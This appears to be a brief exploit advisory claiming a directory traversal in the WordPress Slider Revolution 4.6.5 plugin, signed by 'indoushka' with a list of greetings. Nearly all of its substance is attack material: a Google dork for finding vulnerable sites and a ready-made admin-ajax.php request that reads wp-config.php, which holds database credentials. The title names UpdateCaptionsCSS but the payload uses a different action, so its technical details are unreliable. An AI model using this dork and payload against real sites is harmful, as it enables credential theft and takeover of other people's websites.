WordPress Slider Revolution plugin version 4.6.5 suffers from a directory traversal vulnerability.
c0ad551826885e99515a7f31a6660bf3f6f546a33382b918ec3a80f8f2c57bbc
====================================================================================================================================
| # Title : WordPress - Slider Revolution 4.6.5 UpdateCaptionsCSS Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/27513804 |
| # Dork : revslider.php "index of" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[+] http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================